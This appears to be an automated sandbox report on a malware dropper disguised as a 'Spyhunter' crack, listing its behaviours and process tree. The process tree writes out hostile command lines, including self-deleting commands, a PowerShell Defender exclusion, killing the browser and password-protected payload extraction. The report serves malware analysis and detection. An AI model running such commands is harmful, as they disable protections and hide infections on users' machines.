5b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

5488 regedit.exe
5716 regedit.exe
Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4568 PING.EXE
4232 PING.EXE
1712 PING.EXE
1320 PING.EXE
5660 PING.EXE
2640 PING.EXE

pid	process
5488	regedit.exe
5716	regedit.exe

pid	process
4568	PING.EXE
4232	PING.EXE
1712	PING.EXE
1320	PING.EXE
5660	PING.EXE
2640	PING.EXE

Script User-Agent 9 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	105	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	159	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	214	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	102	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	103	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	128	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	201	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exekey.exe2396.tmp.exe1615147832072.exe1615147834087.exemultitimer.exe

pid	process
2064	file.exe
2064	file.exe
4440	key.exe
4440	key.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
4640	2396.tmp.exe
4640	2396.tmp.exe
1360	1615147832072.exe
1360	1615147832072.exe
4052	1615147834087.exe
4052	1615147834087.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

key.exefile.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeDebugPrivilege	2064	file.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeShutdownPrivilege	3844	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3844	msiexec.exe
Token: SeSecurityPrivilege	2508	msiexec.exe
Token: SeCreateTokenPrivilege	3844	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3844	msiexec.exe
Token: SeLockMemoryPrivilege	3844	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3844	msiexec.exe
Token: SeMachineAccountPrivilege	3844	msiexec.exe
Token: SeTcbPrivilege	3844	msiexec.exe
Token: SeSecurityPrivilege	3844	msiexec.exe
Token: SeTakeOwnershipPrivilege	3844	msiexec.exe
Token: SeLoadDriverPrivilege	3844	msiexec.exe
Token: SeSystemProfilePrivilege	3844	msiexec.exe
Token: SeSystemtimePrivilege	3844	msiexec.exe
Token: SeProfSingleProcessPrivilege	3844	msiexec.exe
Token: SeIncBasePriorityPrivilege	3844	msiexec.exe
Token: SeCreatePagefilePrivilege	3844	msiexec.exe
Token: SeCreatePermanentPrivilege	3844	msiexec.exe
Token: SeBackupPrivilege	3844	msiexec.exe
Token: SeRestorePrivilege	3844	msiexec.exe
Token: SeShutdownPrivilege	3844	msiexec.exe
Token: SeDebugPrivilege	3844	msiexec.exe
Token: SeAuditPrivilege	3844	msiexec.exe

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

msiexec.exechashepro3.tmpSetup3310.tmpIBInstaller_97039.tmpvpn.tmpkk1zazd4ft2.tmpvict.tmp

pid	process
3844	msiexec.exe
3932	chashepro3.tmp
4900	Setup3310.tmp
2232	IBInstaller_97039.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp

Suspicious use of SetWindowsHookEx 31 IoCs

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exefirefox.exe1615147832072.exefirefox.exe1615147834087.exekk1zazd4ft2.exechashepro3.exevict.exeSetup3310.exeaskinstall24.exeIBInstaller_97039.exeSetup3310.tmpchashepro3.tmpkk1zazd4ft2.tmpvict.tmpIBInstaller_97039.tmpvpn.exevpn.tmpBrava.exe8.exechrome_proxy.exeapp.exeThunderFW.exewinlthst.exewimapi.exeSetup.exeSetup.tmp03rmxcykcrh.exe03rmxcykcrh.tmp

pid	process
4944	Setup.exe
3604	C0CA61A12E4C8B38.exe
3820	C0CA61A12E4C8B38.exe
4524	firefox.exe
1360	1615147832072.exe
4788	firefox.exe
4052	1615147834087.exe
1416	kk1zazd4ft2.exe
212	chashepro3.exe
4968	vict.exe
5056	Setup3310.exe
4632	askinstall24.exe
3700	IBInstaller_97039.exe
4900	Setup3310.tmp
3932	chashepro3.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp
2232	IBInstaller_97039.tmp
4564	vpn.exe
1056	vpn.tmp
4920	Brava.exe
5016	8.exe
3252	chrome_proxy.exe
1292	app.exe
5172	ThunderFW.exe
6020	winlthst.exe
6108	wimapi.exe
5240	Setup.exe
968	Setup.tmp
5700	03rmxcykcrh.exe
5176	03rmxcykcrh.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Spyhunter_4_5_7_crack.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exefile.exe2396.tmp.execmd.exe

description	pid	process	target process
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	cmd.exe
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	cmd.exe
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	cmd.exe
PID 2796 wrote to memory of 932	2796	cmd.exe	keygen-pr.exe
PID 2796 wrote to memory of 932	2796	cmd.exe	keygen-pr.exe
PID 2796 wrote to memory of 932	2796	cmd.exe	keygen-pr.exe
PID 2796 wrote to memory of 1012	2796	cmd.exe	keygen-step-1.exe
PID 2796 wrote to memory of 1012	2796	cmd.exe	keygen-step-1.exe
PID 2796 wrote to memory of 1012	2796	cmd.exe	keygen-step-1.exe
PID 2796 wrote to memory of 884	2796	cmd.exe	keygen-step-3.exe
PID 2796 wrote to memory of 884	2796	cmd.exe	keygen-step-3.exe
PID 2796 wrote to memory of 884	2796	cmd.exe	keygen-step-3.exe
PID 2796 wrote to memory of 1184	2796	cmd.exe	keygen-step-4.exe
PID 2796 wrote to memory of 1184	2796	cmd.exe	keygen-step-4.exe
PID 2796 wrote to memory of 1184	2796	cmd.exe	keygen-step-4.exe
PID 932 wrote to memory of 4440	932	keygen-pr.exe	key.exe
PID 932 wrote to memory of 4440	932	keygen-pr.exe	key.exe
PID 932 wrote to memory of 4440	932	keygen-pr.exe	key.exe
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	file.exe
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	file.exe
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	file.exe
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	cmd.exe
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	cmd.exe
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	cmd.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4440 wrote to memory of 4584	4440	key.exe	key.exe
PID 4496 wrote to memory of 4568	4496	cmd.exe	PING.EXE
PID 4496 wrote to memory of 4568	4496	cmd.exe	PING.EXE
PID 4496 wrote to memory of 4568	4496	cmd.exe	PING.EXE
PID 2064 wrote to memory of 3824	2064	file.exe	2396.tmp.exe
PID 2064 wrote to memory of 3824	2064	file.exe	2396.tmp.exe
PID 2064 wrote to memory of 3824	2064	file.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	2396.tmp.exe
PID 2064 wrote to memory of 1016	2064	file.exe	cmd.exe
PID 2064 wrote to memory of 1016	2064	file.exe	cmd.exe
PID 2064 wrote to memory of 1016	2064	file.exe	cmd.exe
PID 1016 wrote to memory of 4232	1016	cmd.exe	PING.EXE
PID 1016 wrote to memory of 4232	1016	cmd.exe	PING.EXE
PID 1016 wrote to memory of 4232	1016	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\Spyhunter_4_5_7_crack.exe
"C:\Users\Admin\AppData\Local\Temp\Spyhunter_4_5_7_crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:932

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:1012

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4496

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:4568

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1184

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2064

C:\Users\Admin\AppData\Roaming\2396.tmp.exe
"C:\Users\Admin\AppData\Roaming\2396.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3824

C:\Users\Admin\AppData\Roaming\2396.tmp.exe
"C:\Users\Admin\AppData\Roaming\2396.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:4232

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4944

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3844

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4524

C:\Users\Admin\AppData\Roaming\1615147832072.exe
"C:\Users\Admin\AppData\Roaming\1615147832072.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615147832072.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1360

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
6⤵
- Suspicious use of SetWindowsHookEx
PID:4788

C:\Users\Admin\AppData\Roaming\1615147834087.exe
"C:\Users\Admin\AppData\Roaming\1615147834087.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615147834087.txt"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4052

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5172

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
6⤵
PID:4520

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:5660

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
5⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3820

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:1408

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4620

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
6⤵
PID:4344

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
7⤵
- Runs ping.exe
PID:1320

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
5⤵
PID:2136

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
6⤵
- Runs ping.exe
PID:1712

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
4⤵
- Executes dropped EXE
PID:4940

C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1916

C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 1 3.1615147620.60453264dc506 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4692

C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 2 3.1615147620.60453264dc506
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1680

C:\Users\Admin\AppData\Local\Temp\ofjeicpph3f\r5a4soiop3w.exe
"C:\Users\Admin\AppData\Local\Temp\ofjeicpph3f\r5a4soiop3w.exe" 57a764d042bf8
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\QH7COMMSFS\QH7COMMSF.exe" 57a764d042bf8 & exit
9⤵
PID:672

C:\Program Files\QH7COMMSFS\QH7COMMSF.exe
"C:\Program Files\QH7COMMSFS\QH7COMMSF.exe" 57a764d042bf8
10⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5708

C:\Users\Admin\AppData\Local\Temp\qjyvd1ps40x\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\qjyvd1ps40x\askinstall24.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4632

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5744

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:5988

C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4564

C:\Users\Admin\AppData\Local\Temp\is-EM5PB.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EM5PB.tmp\vpn.tmp" /SL5="$103B2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:5876

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:5696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:5020

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:2632

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:6688

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\vrt435dfft0\app.exe
"C:\Users\Admin\AppData\Local\Temp\vrt435dfft0\app.exe" /8-23
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Hill"
9⤵
PID:5712

C:\Program Files (x86)\Muddy-Hill\7za.exe
"C:\Program Files (x86)\Muddy-Hill\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
PID:228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Hill\app.exe" -map "C:\Program Files (x86)\Muddy-Hill\WinmonProcessMonitor.sys""
9⤵
PID:2564

C:\Program Files (x86)\Muddy-Hill\app.exe
"C:\Program Files (x86)\Muddy-Hill\app.exe" -map "C:\Program Files (x86)\Muddy-Hill\WinmonProcessMonitor.sys"
10⤵
PID:5844

C:\Program Files (x86)\Muddy-Hill\7za.exe
"C:\Program Files (x86)\Muddy-Hill\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
PID:4000

C:\Program Files (x86)\Muddy-Hill\app.exe
"C:\Program Files (x86)\Muddy-Hill\app.exe" /8-23
9⤵
PID:388

C:\Program Files (x86)\Muddy-Hill\app.exe
"C:\Program Files (x86)\Muddy-Hill\app.exe" /8-23
10⤵
PID:3084

C:\Windows\System32\cmd.exe
